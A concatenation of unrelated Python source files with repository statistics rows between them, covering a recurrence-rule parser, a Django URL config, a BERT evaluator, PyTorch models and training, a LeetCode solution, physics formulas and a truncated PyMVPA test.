if self.year_day is not None:
canonical = "%s day %s" % (
canonical,
self.year_day
)
#(starting <datetimestring>) (ending <datetimestring>)
if not self.starting_date_infinite:
starting_date = self._canonicalize_date(self.starting_date)
canonical = "%s starting %s" % (
canonical,
starting_date.strftime("_%m/%d/%Y")
)
if not self.ending_date_infinite:
ending_date = self._canonicalize_date(self.ending_date)
canonical = "%s ending %s" % (
canonical,
ending_date.strftime("_%m/%d/%Y")
)
if self.repeating_count is not None:
canonical = "%s repeating %s times" % (
canonical,
self.repeating_count
)
starting_time = self._canonicalize_date(self.starting_time)
canonical = "%s at %s" % (
canonical,
starting_time.strftime("%-I:%M%p")
)
canonical = "%s lasting %s seconds in %s" % (
canonical,
self.lasting_seconds,
str(self.timezone)
)
return canonical
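    # Illustrative example of the canonical form built above (the values are hypothetical):
    # an every-2-years rule on year day 45, starting 02/14/2020, at 9:00AM, lasting one hour
    # in UTC would canonicalize to roughly:
    #   "every 2 year day 45 starting _02/14/2020 at 9:00AM lasting 3600 seconds in UTC"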
def occurences(self):
if not self.verify_parsed():
raise RuntimeError("Please call parse before calling occurences")
ending = self.ending_date
repeating_count = self.repeating_count
ending_date_infinite = self.ending_date_infinite
if repeating_count is not None:
ending_date_infinite = False
if ending is not None:
ending = self._set_start_time(ending)
ending = self._strip_microseconds(ending)
occurence_start = self.starting_date
if self.year_day is not None:
try:
occurence_start = self._snap_datetime(self.starting_date,self.year_day)
except ValueError:
#If we had a problem, try the next year
occurence_start = self._snap_datetime(
self.starting_date+relativedelta(years=+1),
self.year_day
)
occurence_start = self._set_start_time(occurence_start)
occurence_start = self._strip_microseconds(occurence_start)
occurence_block = OccurenceBlock(
starting_date=occurence_start,
ending_date=None,
starting_date_infinite=self.starting_date_infinite,
ending_date_infinite=ending_date_infinite,
typeobj=self
)
repeated = 1
occurence_end = None
#While we're before the end date (if we have it)
        #And we're before the max repetitions (if we have it)
while ((ending is None or occurence_start <= ending)
and (repeating_count is None or repeated <= repeating_count)):
occurence_end = self._get_end_datetime(occurence_start)
occurence_end = self._strip_microseconds(occurence_end)
occurence_block.add_occurence(occurence_start,occurence_end)
occurence_start = self._increment_occurence(occurence_start)
occurence_start = self._strip_microseconds(occurence_start)
repeated+=1
occurence_block.ending_date = occurence_end
        #We always return an OccurenceGroup, even if there is just one block
return OccurenceGroup(blocks=[occurence_block])
def _parse_type(self,tokens):
if tokens[0] == 'day':
tokens = self._step_tokens(tokens)
try:
self.year_day = int(tokens[0])
except ValueError:
raise ValueError("Invalid year day")
tokens = self._step_tokens(tokens)
self.type = YEARLY_TYPE
return tokens
| 30.060606
| 87
| 0.594153
| 526
| 4,960
| 5.359316
| 0.222433
| 0.074495
| 0.044697
| 0.025541
| 0.208585
| 0.125576
| 0.092941
| 0.077332
| 0.044697
| 0
| 0
| 0.002107
| 0.330242
| 4,960
| 164
| 88
| 30.243902
| 0.846478
| 0.050806
| 0
| 0.157895
| 0
| 0
| 0.053214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.04386
| 0.008772
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880d94d22915e741e24ad40b49de37d7ad8757e9
| 625
|
py
|
Python
|
project/urls.py
|
dbinetti/captable
|
29769b2b99a3185fda241b3087ccbe621f8c97a2
|
[
"BSD-2-Clause"
] | 18
|
2016-05-12T18:49:09.000Z
|
2021-10-05T13:29:09.000Z
|
project/urls.py
|
dbinetti/captable
|
29769b2b99a3185fda241b3087ccbe621f8c97a2
|
[
"BSD-2-Clause"
] | null | null | null |
project/urls.py
|
dbinetti/captable
|
29769b2b99a3185fda241b3087ccbe621f8c97a2
|
[
"BSD-2-Clause"
] | 5
|
2015-08-28T02:50:30.000Z
|
2019-11-14T04:03:05.000Z
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic import TemplateView
urlpatterns = patterns(
'',
url(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),
url(r'^about/$', TemplateView.as_view(template_name='about.html'), name='about'),
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('apps.captable.urls',)),
)
urlpatterns += staticfiles_urlpatterns()
| 31.25
| 85
| 0.7248
| 79
| 625
| 5.658228
| 0.367089
| 0.044743
| 0.076063
| 0.116331
| 0.134228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1088
| 625
| 19
| 86
| 32.894737
| 0.802513
| 0
| 0
| 0
| 0
| 0
| 0.1664
| 0.0464
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880ea7ec7f81ab78d2446766017eac398be3d80f
| 9,388
|
py
|
Python
|
common/evaluators/bert_emotion_evaluator.py
|
marjanhs/procon20
|
c49ad38a77e58fd84ff0409cc9f5081c6de0bf0b
|
[
"MIT"
] | 5
|
2020-07-12T08:27:47.000Z
|
2021-10-16T11:40:48.000Z
|
common/evaluators/bert_emotion_evaluator.py
|
marjanhs/procon20
|
c49ad38a77e58fd84ff0409cc9f5081c6de0bf0b
|
[
"MIT"
] | null | null | null |
common/evaluators/bert_emotion_evaluator.py
|
marjanhs/procon20
|
c49ad38a77e58fd84ff0409cc9f5081c6de0bf0b
|
[
"MIT"
] | 1
|
2021-04-12T09:54:37.000Z
|
2021-04-12T09:54:37.000Z
|
import warnings
import numpy as np
import torch
import torch.nn.functional as F
from sklearn import metrics
from torch.utils.data import DataLoader, SequentialSampler, TensorDataset
from tqdm import tqdm
from datasets.bert_processors.abstract_processor import convert_examples_to_features_with_emotion, \
convert_examples_to_hierarchical_features
from utils.preprocessing import pad_input_matrix
from utils.tokenization import BertTokenizer
from utils.emotion import Emotion
# Suppress warnings from sklearn.metrics
warnings.filterwarnings('ignore')
class BertEvaluator(object):
def __init__(self, model, processor, args, split='dev'):
self.args = args
self.model = model
self.processor = processor
self.tokenizer = BertTokenizer.from_pretrained(args.model, is_lowercase=args.is_lowercase)
self.emotioner = Emotion(args.nrc_path, args.max_em_len, args.emotion_filters)
if split == 'test':
self.eval_examples = self.processor.get_test_examples(args.data_dir, args.test_name)
elif split == 'dev':
self.eval_examples = self.processor.get_dev_examples(args.data_dir, args.dev_name)
else:
self.eval_examples = self.processor.get_any_examples(args.data_dir, split)
def get_scores(self, silent=False, return_indices=False):
all_indices = []
if self.args.is_hierarchical:
eval_features = convert_examples_to_hierarchical_features(
self.eval_examples, self.args.max_seq_length, self.tokenizer)
else:
eval_features = convert_examples_to_features_with_emotion(
self.eval_examples, self.args.max_seq_length, self.tokenizer, self.emotioner)
unpadded_input_ids = [f.input_ids for f in eval_features]
unpadded_input_mask = [f.input_mask for f in eval_features]
unpadded_segment_ids = [f.segment_ids for f in eval_features]
unpadded_emotion_scores = [f.sentiment_scores for f in eval_features]
if self.args.is_hierarchical:
pad_input_matrix(unpadded_input_ids, self.args.max_doc_length)
pad_input_matrix(unpadded_input_mask, self.args.max_doc_length)
pad_input_matrix(unpadded_segment_ids, self.args.max_doc_length)
padded_input_ids = torch.tensor(unpadded_input_ids, dtype=torch.long)
padded_input_mask = torch.tensor(unpadded_input_mask, dtype=torch.long)
padded_segment_ids = torch.tensor(unpadded_segment_ids, dtype=torch.long)
padded_emotion_ids = torch.tensor(unpadded_emotion_scores, dtype=torch.long)
label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)
eval_data = TensorDataset(padded_input_ids, padded_input_mask, padded_segment_ids, padded_emotion_ids, label_ids)
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=self.args.batch_size)
self.model.eval()
total_loss = 0
nb_eval_steps, nb_eval_examples = 0, 0
predicted_labels, target_labels = list(), list()
for input_ids, input_mask, segment_ids, emotion_ids, label_ids in tqdm(eval_dataloader, desc="Evaluating", disable=silent):
input_ids = input_ids.to(self.args.device)
input_mask = input_mask.to(self.args.device)
segment_ids = segment_ids.to(self.args.device)
emotion_ids = emotion_ids.to(self.args.device)
label_ids = label_ids.to(self.args.device)
with torch.no_grad():
if return_indices:
outs = self.model(input_ids, segment_ids, input_mask, emotion_ids=emotion_ids, return_indices=return_indices)
else:
outs = self.model(input_ids, segment_ids, input_mask, emotion_ids=emotion_ids)
if isinstance(outs, tuple):
outs, _ = outs
if return_indices:
logits, indices = outs
all_indices.extend(indices.cpu().detach().numpy())
else:
logits = outs
if self.args.is_multilabel:
predicted_labels.extend(F.sigmoid(logits).round().long().cpu().detach().numpy())
target_labels.extend(label_ids.cpu().detach().numpy())
loss = F.binary_cross_entropy_with_logits(logits, label_ids.float(), size_average=False)
average, average_mac = 'micro', 'macro'
else:
predicted_labels.extend(torch.argmax(logits, dim=1).cpu().detach().numpy())
target_labels.extend(torch.argmax(label_ids, dim=1).cpu().detach().numpy())
loss = F.cross_entropy(logits, torch.argmax(label_ids, dim=1))
average, average_mac = 'binary', 'binary'
if self.args.n_gpu > 1:
loss = loss.mean()
if self.args.gradient_accumulation_steps > 1:
loss = loss / self.args.gradient_accumulation_steps
total_loss += loss.item()
nb_eval_examples += input_ids.size(0)
nb_eval_steps += 1
predicted_labels, target_labels = np.array(predicted_labels), np.array(target_labels)
accuracy = metrics.accuracy_score(target_labels, predicted_labels)
precision = metrics.precision_score(target_labels, predicted_labels, average=average)
recall = metrics.recall_score(target_labels, predicted_labels, average=average)
avg_loss = total_loss / nb_eval_steps
hamming_loss = metrics.hamming_loss(target_labels, predicted_labels)
jaccard_score = metrics.jaccard_score(target_labels, predicted_labels, average=average)
f1_micro = metrics.f1_score(target_labels, predicted_labels, average=average)
f1_macro = metrics.f1_score(target_labels, predicted_labels, average=average_mac)
if return_indices:
return [accuracy, precision, recall, f1_micro, avg_loss, f1_macro, hamming_loss, jaccard_score, predicted_labels, target_labels, all_indices],\
['accuracy', 'precision', 'recall', 'f1_micro', 'avg_loss', 'f1_macro', 'hamming_loss', 'jaccard', 'predicted_labels', 'target_labels', 'all_indices']
else:
return [accuracy, precision, recall, f1_micro, avg_loss, f1_macro, hamming_loss, jaccard_score, predicted_labels, target_labels],\
['accuracy', 'precision', 'recall', 'f1_micro', 'avg_loss', 'f1_macro', 'hamming_loss', 'jaccard', 'predicted_labels', 'target_labels']
def get_bert_layers(self, silent=False, last_bert_layers=-1):
if self.args.is_hierarchical:
eval_features = convert_examples_to_hierarchical_features(
self.eval_examples, self.args.max_seq_length, self.tokenizer)
else:
eval_features = convert_examples_to_features_with_emotion(
self.eval_examples, self.args.max_seq_length, self.tokenizer, self.emotioner)
unpadded_input_ids = [f.input_ids for f in eval_features]
unpadded_input_mask = [f.input_mask for f in eval_features]
unpadded_segment_ids = [f.segment_ids for f in eval_features]
        unpadded_emotion_ids = [f.sentiment_scores for f in eval_features]
if self.args.is_hierarchical:
pad_input_matrix(unpadded_input_ids, self.args.max_doc_length)
pad_input_matrix(unpadded_input_mask, self.args.max_doc_length)
pad_input_matrix(unpadded_segment_ids, self.args.max_doc_length)
padded_input_ids = torch.tensor(unpadded_input_ids, dtype=torch.long)
padded_input_mask = torch.tensor(unpadded_input_mask, dtype=torch.long)
padded_segment_ids = torch.tensor(unpadded_segment_ids, dtype=torch.long)
padded_emotion_ids = torch.tensor(unpadded_emotion_ids, dtype=torch.long)
label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)
eval_data = TensorDataset(padded_input_ids, padded_input_mask, padded_segment_ids, padded_emotion_ids, label_ids)
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=self.args.batch_size)
self.model.eval()
bert_layers_l, label_ids_l = [], []
for input_ids, input_mask, segment_ids, emotion_ids, label_ids in tqdm(eval_dataloader, desc="Evaluating", disable=silent):
input_ids = input_ids.to(self.args.device)
input_mask = input_mask.to(self.args.device)
segment_ids = segment_ids.to(self.args.device)
emotion_ids = emotion_ids.to(self.args.device)
label_ids = label_ids.to(self.args.device)
with torch.no_grad():
bert_layers = self.model.get_bert_embedding(input_ids, segment_ids, input_mask, emotion_ids=emotion_ids, last_bert_layers=last_bert_layers)
label_ids = torch.argmax(label_ids, dim=1).cpu().detach().numpy()
bert_layers_l.extend(bert_layers)
label_ids_l.extend(label_ids)
bert_layers_l = torch.stack(bert_layers_l, dim=0)
return bert_layers_l, label_ids_l
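# Illustrative usage sketch (the names below are assumptions, not from the original project):
# with an already-configured model, processor and args namespace, evaluation would look like
#   evaluator = BertEvaluator(model, processor, args, split='dev')
#   scores, score_names = evaluator.get_scores(silent=True)
#   print(dict(zip(score_names, scores)))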
| 51.582418
| 166
| 0.678526
| 1,188
| 9,388
| 5.022727
| 0.127104
| 0.041562
| 0.018435
| 0.016759
| 0.686275
| 0.651249
| 0.604491
| 0.589073
| 0.580694
| 0.549858
| 0
| 0.003474
| 0.233383
| 9,388
| 181
| 167
| 51.867403
| 0.825622
| 0.004048
| 0
| 0.450704
| 0
| 0
| 0.028263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021127
| false
| 0
| 0.077465
| 0
| 0.126761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
881189eb3c68f5eb6d4b3bde9fa97065430d1651
| 781
|
py
|
Python
|
model/mlp1.py
|
andrearosasco/DistilledReplay
|
2a4efa88d22b9afc7016f07549114688f346dbe8
|
[
"MIT"
] | 7
|
2021-06-27T16:09:13.000Z
|
2022-03-17T20:02:55.000Z
|
model/mlp1.py
|
andrew-r96/DistilledReplay
|
2a4efa88d22b9afc7016f07549114688f346dbe8
|
[
"MIT"
] | null | null | null |
model/mlp1.py
|
andrew-r96/DistilledReplay
|
2a4efa88d22b9afc7016f07549114688f346dbe8
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self, config):
super(Model, self).__init__()
self.drop = nn.Dropout(config['dropout'])
self.fc1 = nn.Linear(784, 2000)
self.fc2 = nn.Linear(2000, 2000)
self.fc3 = nn.Linear(2000, 2000)
self.fc4 = nn.Linear(2000, 2000)
self.fc5 = nn.Linear(2000, 10)
def forward(self, x):
# 784 -> 2000
x = F.relu(self.drop(self.fc1(x)))
# 2000 -> 2000
x = F.relu(self.drop(self.fc2(x)))
# 2000 -> 2000
x = F.relu(self.drop(self.fc3(x)))
# 2000 -> 2000
x = F.relu(self.drop(self.fc4(x)))
# 2000 -> 100
x = self.fc5(x)
return x
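# Illustrative usage sketch (the config dict below is a hypothetical example, not taken from
# the original repository):
def _example_forward():
    import torch
    model = Model({'dropout': 0.5})
    batch = torch.randn(32, 784)   # e.g. a batch of flattened 28x28 MNIST images
    return model(batch)            # logits with shape (32, 10)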
| 28.925926
| 50
| 0.516005
| 111
| 781
| 3.558559
| 0.27027
| 0.121519
| 0.121519
| 0.101266
| 0.412658
| 0.260759
| 0.260759
| 0.205063
| 0.205063
| 0
| 0
| 0.162835
| 0.331626
| 781
| 27
| 51
| 28.925926
| 0.59387
| 0.079385
| 0
| 0
| 0
| 0
| 0.010174
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
881335d234ca66e078e1413e1e2269e82e80ed06
| 5,709
|
py
|
Python
|
train.py
|
VArdulov/learning-kis
|
2637f08d5e8027a22feff17064be45ea51f738e5
|
[
"MIT"
] | null | null | null |
train.py
|
VArdulov/learning-kis
|
2637f08d5e8027a22feff17064be45ea51f738e5
|
[
"MIT"
] | null | null | null |
train.py
|
VArdulov/learning-kis
|
2637f08d5e8027a22feff17064be45ea51f738e5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
""" Learning Koopman Invariant Subspace
(c) Naoya Takeishi, 2017.
takeishi@ailab.t.u-tokyo.ac.jp
"""
import numpy as np
np.random.seed(1234567890)
from argparse import ArgumentParser
from os import path
import time
from lkis import TimeSeriesBatchMaker, KoopmanInvariantSubspaceLearner
from losses import combined_loss
from torch import device, save, manual_seed
from torch.optim import SGD
import matplotlib.pyplot as plt
import seaborn as sns
# -- Parse arguments
t = time.time()
parser = ArgumentParser(description='Learning Koopman Invariant Subspace (Now with PyTorch!)')
parser.add_argument("--name", "-n", type=str, default=f"lkis-{int(time.time())}", help="name of experiment")
parser.add_argument("--data-path", type=str, default="./train.npy", help="time-series data to model")
parser.add_argument("--epochs", "-e", type=int, default=1000, help="number of epochs to train for")
parser.add_argument("--num-batches", "-b", type=int, default=1, help="how many batches to break the data up into")
parser.add_argument("--gpu", action="store_true", default=False, help="use a GPU or not")
parser.add_argument("--intermediate-observable", "-i", type=int, default=-1, help="intermediate dimensional observation space")
parser.add_argument("--save-model", "-m", action="store_true", default=False, help="whether or not you want the model saved to $name$.torch.mdl")
parser.add_argument("--save-training-plot", "-p", action="store_true", default=False, help="where to save plotting")
parser.add_argument("--max-lag", "-l", type=int, default=-1, help="maximum_lag")
parser.add_argument("--state-space", "-s", type=int, default=1, help="dimensionality of the underlying state space")
parser.add_argument("--alpha", "-a", type=float, default=1.0, help="value to score the reconstruction loss by")
parser.add_argument("--learning-rate", "-r", type=float, default=0.001, help="Optimizer learning rate")
parser.add_argument("--validation-data-path", "-v", type=str, default="")
#ToDo: Implement
parser.add_argument("--dmd", action="store_true", default=False, help="Execute and save the DMD on the training set")
if __name__ == "__main__":
# grab the command line arguments
cli_args = parser.parse_args()
manual_seed(216)
# find and load the training data
data_path = cli_args.data_path
print(f"Loading training data from {data_path}")
data_train = np.load(data_path)
if len(data_train.shape) == 1:
data_train = data_train.reshape(-1, 1)
print(f"Loaded a dataset with dimension: {data_train.shape}")
validate = cli_args.validation_data_path != ""
data_val = None
if validate:
data_path = cli_args.validation_data_path
print(f"Loading validation data from {data_path}")
data_val = np.load(data_path)
# process the delay: either set by the user or defaulted to one tenth of the data length
delay = cli_args.max_lag if cli_args.max_lag > 0 else (data_train.shape[0] // 10)
# based on the number of batches, delay, and size of the data compute the samples per batch
samples_per_batch = (data_train.shape[0] - delay) // cli_args.num_batches
# construct the data preparer
batch_iterator = TimeSeriesBatchMaker(
y=data_train,
batch_size=samples_per_batch,
max_lag=delay
)
if validate:
val_batch_iterator = TimeSeriesBatchMaker(
y=data_val,
max_lag=delay
)
# construct the end-to-end model
lkis = KoopmanInvariantSubspaceLearner(
observable_dim=data_train.shape[1],
latent_dim=cli_args.state_space,
intermediate_observable=cli_args.intermediate_observable,
delay=delay
)
if cli_args.gpu:
device = device("cuda")
# the model must be moved to the GPU as well, not just the batches
lkis = lkis.to(device)
# initialize the optimizer
optimizer = SGD(lkis.parameters(), lr=cli_args.learning_rate)
losses = []
val_losses = []
for epoch in range(cli_args.epochs):
loss = 0
for b in range(cli_args.num_batches):
optimizer.zero_grad()
time_delayed_ys, y_true = next(batch_iterator)
if cli_args.gpu:
# Tensor.to() returns a new tensor rather than moving in place, so reassign
time_delayed_ys = time_delayed_ys.to(device)
y_true = y_true.to(device)
g_pred, y_pred = lkis(time_delayed_ys)
g_0 = g_pred[:-1]
g_1 = g_pred[1:]
batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
batch_loss.backward()
optimizer.step()
loss += batch_loss.item()
# display the epoch training loss
print(f"epoch : {epoch + 1}/{cli_args.epochs}, loss = {loss:.6f}")
losses.append(loss)
if validate:
y_time_delayed_val, y_true = next(val_batch_iterator)
if cli_args.gpu:
# reassign here too, since Tensor.to() does not move tensors in place
y_time_delayed_val = y_time_delayed_val.to(device)
y_true = y_true.to(device)
g_pred, y_pred = lkis(y_time_delayed_val)
g_0 = g_pred[:-1]
g_1 = g_pred[1:]
batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
val_loss = batch_loss.item()
print(f"\tval-loss = {val_loss:.6f}")
val_losses.append(val_loss)
if cli_args.save_model:
save(lkis, f"{cli_args.name}.torch.mdl")
if cli_args.save_training_plot:
sns.lineplot(x=list(range(cli_args.epochs)), y=losses, label="training loss")
if validate:
sns.lineplot(x=list(range(cli_args.epochs)), y=val_losses, label="validation loss")
plt.xlabel("Epochs")
plt.ylabel("Combined Reconstruction and DMD Loss")
plt.title(f"Training Loss for {cli_args.name}")
plt.savefig(f"{cli_args.name}-training-loss.png")
| 38.574324
| 145
| 0.669294
| 825
| 5,709
| 4.432727
| 0.266667
| 0.044025
| 0.065081
| 0.016407
| 0.196883
| 0.121411
| 0.073831
| 0.073831
| 0.073831
| 0.05469
| 0
| 0.013932
| 0.207917
| 5,709
| 147
| 146
| 38.836735
| 0.794781
| 0.088632
| 0
| 0.163462
| 0
| 0
| 0.216712
| 0.028753
| 0
| 0
| 0
| 0.006803
| 0
| 1
| 0
| false
| 0
| 0.096154
| 0
| 0.096154
| 0.048077
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8813da3968ae4a879a3ffd1fca43f066e89df5ea
| 671
|
py
|
Python
|
Algorithms/Easy/1200. Minimum Absolute Difference/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
Algorithms/Easy/1200. Minimum Absolute Difference/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
Algorithms/Easy/1200. Minimum Absolute Difference/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
class Solution:
def minimumAbsDifference(self, arr: List[int]) -> List[List[int]]:
arr.sort()
res = []
min_diff = arr[1] - arr[0]
res.append([arr[0], arr[1]])
for i in range(1, len(arr)-1):
diff = arr[i+1]-arr[i]
if diff < min_diff:
min_diff = diff
res.clear()
res.append([arr[i], arr[i+1]])
elif diff == min_diff:
res.append([arr[i], arr[i+1]])
return res
if __name__ == "__main__":
s = Solution()
result = s.minimumAbsDifference([3, 8, -10, 23, 19, -4, -14, 27])
print(result)
| 26.84
| 70
| 0.490313
| 91
| 671
| 3.483516
| 0.43956
| 0.07571
| 0.113565
| 0.082019
| 0.113565
| 0.113565
| 0.113565
| 0
| 0
| 0
| 0
| 0.050459
| 0.350224
| 671
| 24
| 71
| 27.958333
| 0.676606
| 0
| 0
| 0.1
| 0
| 0
| 0.011923
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.2
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8814231575bbe6e4934834a1434e867f02c0e57d
| 2,125
|
py
|
Python
|
resources/physequations.py
|
VijayStroup/Physics_Problem_Solver_Basic
|
fc6944475ed8bcfe91bbd207734c3f9aee31e0fe
|
[
"MIT"
] | null | null | null |
resources/physequations.py
|
VijayStroup/Physics_Problem_Solver_Basic
|
fc6944475ed8bcfe91bbd207734c3f9aee31e0fe
|
[
"MIT"
] | null | null | null |
resources/physequations.py
|
VijayStroup/Physics_Problem_Solver_Basic
|
fc6944475ed8bcfe91bbd207734c3f9aee31e0fe
|
[
"MIT"
] | null | null | null |
import math
def close(expected, actual, maxerror):
'''checks to see if the actual number is within expected +- maxerror.'''
low = expected - maxerror
high = expected + maxerror
if actual >= low and actual <= high:
return True
else:
return False
def grav_potential_energy(mass, height, gravity=9.81):
'''calculate potential energy given mass and height. Mass in
kilograms and height in meters.'''
gp_energy = mass * height * gravity
return gp_energy
def kin_energy(mass, velocity):
'''calculate kinetic energy given mass and velocity. Mass in
kilograms and velocity in meters per second.'''
k_energy = .5 * mass * velocity ** 2
return k_energy
def work_energy(force, displacement, angle):
'''calculate work energy given force, displacement,
and angle. Force in newtons, displacement in meters, angle in degrees.'''
anglerad = math.radians(angle)
cos = math.cos(anglerad)
w_energy = force * displacement * cos
return w_energy
'''=============================================================================
Tests
============================================================================='''
if __name__ == '__main__':
def check(funcname, args, expected, ans, maxerror):
if not close(expected, ans, maxerror):
print(f'{funcname}({args}) = {ans} should = {expected}')
print(close(10, 11.1, 1))
print(close(100, 100.001, .01))
print(close(-10, -11.01, 1))
print(close(84756, 84300.2, 500.5))
#gravitational potential energy tests
ans = grav_potential_energy(3.00, 7.00)
check('grav_potential_energy', '3.00, 7.00', 206.01, ans, 0.00000000000000000000000001)
ans = grav_potential_energy(2.00, 5.00)
check('grav_potential_energy', '2.00, 5.00', 98.1, ans, 0.01)
#kinetic energy tests
ans = kin_energy(2, 6.55)
check('kin_energy', '2, 6.55', 42.90, ans, 0.01)
ans = kin_energy(5.65, 10)
check('kin_energy', '5.65, 10', 282.5, ans, 0.1)
#work energy tests
ans = work_energy(500, 10, 0)
check('work_energy', '500, 10, 0', 5000.0, ans, 0.1)
ans = work_energy(150, 50, 45)
check('work_energy', '150, 50, 45', 5303.30, ans, 0.01)
| 32.19697
| 88
| 0.631059
| 304
| 2,125
| 4.299342
| 0.3125
| 0.080337
| 0.072686
| 0.035195
| 0.175976
| 0.076511
| 0.076511
| 0
| 0
| 0
| 0
| 0.100845
| 0.164706
| 2,125
| 65
| 89
| 32.692308
| 0.635493
| 0.212706
| 0
| 0
| 0
| 0
| 0.135192
| 0.029268
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128205
| false
| 0
| 0.025641
| 0
| 0.282051
| 0.128205
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
71467296157c3ad9afffaf380b92ae10d722c419
| 10,659
|
py
|
Python
|
mvpa2/tests/test_erdataset.py
|
andycon/PyMVPA
|
67f7ee68012e3a1128168c583d6c83303b7a2c27
|
[
"MIT"
] | null | null | null |
mvpa2/tests/test_erdataset.py
|
andycon/PyMVPA
|
67f7ee68012e3a1128168c583d6c83303b7a2c27
|
[
"MIT"
] | null | null | null |
mvpa2/tests/test_erdataset.py
|
andycon/PyMVPA
|
67f7ee68012e3a1128168c583d6c83303b7a2c27
|
[
"MIT"
] | null | null | null |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the PyMVPA package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
'''Tests for the event-related dataset'''
from mvpa2.testing import *
from mvpa2.datasets import dataset_wizard
from mvpa2.mappers.flatten import FlattenMapper
from mvpa2.mappers.boxcar import BoxcarMapper
from mvpa2.mappers.fx import FxMapper
from mvpa2.datasets.eventrelated import find_events, eventrelated_dataset, \
extract_boxcar_event_samples
from mvpa2.datasets.sources import load_example_fmri_dataset
from mvpa2.mappers.zscore import zscore
def test_erdataset():
# 3 chunks, 5 targets, blocks of 5 samples each
nchunks = 3
ntargets = 5
blocklength = 5
nfeatures = 10
targets = np.tile(np.repeat(range(ntargets), blocklength), nchunks)
chunks = np.repeat(np.arange(nchunks), ntargets * blocklength)
samples = np.repeat(
np.arange(nchunks * ntargets * blocklength),
nfeatures).reshape(-1, nfeatures)
ds = dataset_wizard(samples, targets=targets, chunks=chunks)
# check if events are determined properly
evs = find_events(targets=ds.sa.targets, chunks=ds.sa.chunks)
for ev in evs:
assert_equal(ev['duration'], blocklength)
assert_equal(ntargets * nchunks, len(evs))
for t in range(ntargets):
assert_equal(len([ev for ev in evs if ev['targets'] == t]),
nchunks)
# now turn `ds` into an event-related dataset
erds = eventrelated_dataset(ds, evs)
# the only unprefixed sample attributes are
assert_equal(sorted([a for a in ds.sa if not a.startswith('event')]),
['chunks', 'targets'])
# samples as expected?
assert_array_equal(erds.samples[0],
